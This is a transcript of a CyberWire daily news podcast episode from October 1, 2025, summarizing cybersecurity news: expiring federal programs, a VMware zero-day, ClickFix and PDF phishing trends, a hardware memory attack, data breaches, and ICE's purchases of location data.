When politics break the firewall.

Major federal cybersecurity programs expire amidst the government shutdown. Global leaders and experts convene in Riyadh for the Global Cybersecurity Forum. NIST tackles removable media. ICE buys vast troves of smartphone location data. Researchers claim a newly patched VMware vulnerability has been a zero-day for nearly a year. ClickFix-style attacks surge and spread across platforms. Battering RAM defeats memory encryption and boot-time defenses. A new phishing toolkit converts ordinary PDFs into interactive lures. A trio of breaches exposes data of 3.7 million across North America. Tim Starks from CyberScoop unpacks a report from Senate Democrats on DOGE. The Lone Star State proves even the internet isn’t bulletproof.

Today is Wednesday October 1st 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Two major federal cybersecurity programs expire amidst the government shutdown. 

Two major federal cybersecurity programs are set to expire this morning as Congress remains deadlocked over government funding. The Cybersecurity Information Sharing Act of 2015, which shields companies that share threat intelligence, and the $1 billion State and Local Cybersecurity Grant Program will both lapse without reauthorization.

The House advanced renewal bills earlier this month, but Senate gridlock has left the programs tied to a stalled stopgap spending measure. Tensions boiled over Tuesday, with Sen. Gary Peters (D-MI) warning the lapse would weaken U.S. defenses, while Sen. Rand Paul (R-KY) blocked an extension, citing concerns about alleged free speech abuses by the Cybersecurity and Infrastructure Security Agency.

Former CISA deputy director Nitin Natarajan said both efforts are critical for resilience, particularly for smaller jurisdictions. Without them, he warned, threat sharing and cyber defenses will diminish, raising risks for everyday Americans.

Global leaders and experts convene in Riyadh for the Global Cybersecurity Forum. 

Global leaders and experts convened in Riyadh for the Global Cybersecurity Forum, focusing on “scaling cohesive advancement in cyberspace.” Discussions centered on artificial intelligence, quantum computing, and the urgent need for global cooperation to counter rapidly evolving cyber threats. Speakers highlighted AI’s dual role as both a defensive tool and an attack enabler, stressing the importance of resilience over purely preventive strategies.

ITU Secretary-General Doreen Bogdan-Martin underscored the value of standards for trust in communications, while Interpol officials compared personal cyber defense to securing one’s home. Other panelists warned that cyberattacks target people as much as machines, with rising risks from disinformation and low-cost AI-driven exploits. Saudi Arabia and the UN announced a new global capacity-building initiative to strengthen training, research, and policy development worldwide.

NIST tackles removable media. 

NIST has released Special Publication 1334, a concise guide to managing cybersecurity risks from removable media in operational technology environments. The document highlights USB flash drives as common tools for firmware updates and diagnostics but also major malware vectors threatening industrial control systems. The two-page guide outlines procedural, physical, technical, and transportation controls, urging strict policies, secure storage, malware scanning, and data sanitization. NIST warns infected devices can disrupt operations or compromise safety, underscoring the growing sophistication of OT-targeted threats.

ICE buys vast troves of smartphone location data. 

Immigration and Customs Enforcement (ICE) has resumed purchasing access to vast troves of smartphone location data, according to documents reviewed by 404 Media. ICE selected surveillance tools from Penlink, whose products Tangles and Webloc aggregate billions of daily signals from hundreds of millions of devices and link them with social media data for analysis. The decision reverses earlier assurances that ICE had ended such practices after a Department of Homeland Security Inspector General report found the agency violated the law by using location data without adequate safeguards. Critics, including Sen. Ron Wyden, warn the program enables warrantless tracking of Americans’ movements in sensitive areas such as abortion clinics or houses of worship. ICE maintains the data is necessary to support investigative missions.

Researchers claim a newly patched VMware vulnerability has been a zero-day for nearly a year. 

A newly patched VMware vulnerability, CVE-2025-41244, has been exploited as a zero-day since October 2024, according to NVISO Labs. The flaw, rated high-severity with a CVSS score of 7.8, impacts VMware Aria Operations and VMware Tools, allowing attackers to escalate privileges to root on virtual machines. While Broadcom released patches this week, its advisory did not acknowledge in-the-wild exploitation. NVISO attributes the activity to Chinese state-sponsored group UNC5174, which has used the bug for at least a year. The issue also affects the open-source variant open-vm-tools, included in major Linux distributions. NVISO warns attackers can exploit weak regex logic to elevate malicious binaries staged in writable directories. Broadcom has patched affected products, with Linux vendors to deliver updates for open-vm-tools.

ClickFix-style attacks surge and spread across platforms. 

ClickFix-style attacks are surging and spreading across platforms. Huntress reports a 631 percent rise in incidents over six months, with techniques now abusing native macOS and Linux functions, not just Windows.

Adversaries weaponize user helpfulness: fake verifications and interstitials copy attacker commands to the clipboard, then prompt execution via Run, File Explorer, PowerShell, or staged downloads. Variants include FileFix, TerminalFix, and DownloadFix. Observed payload flows show explorer.exe or a browser spawning scripting interpreters and making outbound connections, with registry and file artifacts that aid detection.

This matters because these lures bypass technical controls and target behavior. Detection “chokepoints” focus on interpreters, suspicious parent processes, and network egress, plus behavioral analytics and process-relationship monitoring to cover future iterations and payload swaps, including scams and phishing.

Battering RAM defeats memory encryption and boot-time defenses. 

Researchers representing KU Leuven in Belgium and the University of Birmingham and Durham University in the UK disclosed Battering RAM, a hardware attack that uses a ~$50 interposer placed between CPU and DRAM to gain plaintext access to protected memory on Intel and AMD systems. The technique can bypass Intel SGX and AMD SEV-SNP, defeating memory encryption and boot-time defenses by redirecting protected addresses to attacker-controlled locations. The proof-of-concept targets DDR4, requires brief physical access, and cannot be patched by software. Intel and AMD say physical-access attacks fall outside their threat models. Full technical details were published by the researchers.

A new phishing toolkit converts ordinary PDFs into interactive lures. 

A new phishing and malware toolkit called MatrixPDF converts ordinary PDFs into interactive lures that can bypass email defenses and redirect victims to credential-theft pages or malware, Varonis researchers told BleepingComputer. First seen on cybercrime forums and promoted via Telegram, the builder—marketed as a phishing-simulation and blackteaming product—lets attackers import legitimate PDFs, add blurred content and fake “Secure Document” prompts, and embed JavaScript and clickable overlays that open external payload URLs. Because the PDFs carry no malicious binaries, Gmail’s viewer does not execute PDF JavaScript and treats subsequent fetches as user-initiated clicks, enabling a filter bypass. MatrixPDF is sold by subscription. Varonis urges AI-driven email defenses that analyze PDF structure, detect overlays, and detonate embedded URLs in sandboxes.

A trio of breaches exposes data of 3.7 million across North America. 

Three companies disclosed breaches this week impacting about 3.7 million people across North America. Allianz Life confirmed nearly 1.5 million customers, staff, and financial professionals were exposed in a third-party CRM break-in, with Social Security numbers among the data stolen. Canadian airline WestJet reported 1.2 million Americans’ information compromised in a June attack linked to Scattered Spider, though no payment data was taken. Meanwhile, Ohio-based Motility Software Solutions said ransomware affected 766,670 people, potentially exposing personal and license data. All firms offered credit monitoring.

The Lone Star State proves even the internet isn’t bulletproof. 

The internet, it turns out, is just as fragile as the squirrels and snakes that occasionally gnaw or slither their way into service outages. Last week in Texas, though, the culprit wasn’t wildlife but a bullet. A stray round pierced a fiber optic cable, cutting off Spectrum service for 25,000 people across Dallas, Austin, San Antonio, and beyond. Customers lost internet, phones, and TV—mid-meeting, mid-binge, mid-life. Spectrum confirmed the gunshot damage but offered no clues about who fired the shot or how they figured it out. In sprawling Texas, with its abundance of firearms and jurisdictions, tracing one stray bullet is like hunting tumbleweeds. America has seen wildlife take out the internet before, but only here do bullets sometimes join the food chain of digital disruption.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

 

N2K’s senior producer is Alice Carruth. Our producer is Liz Stokes. We’re mixed by Elliott Peltzman and Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.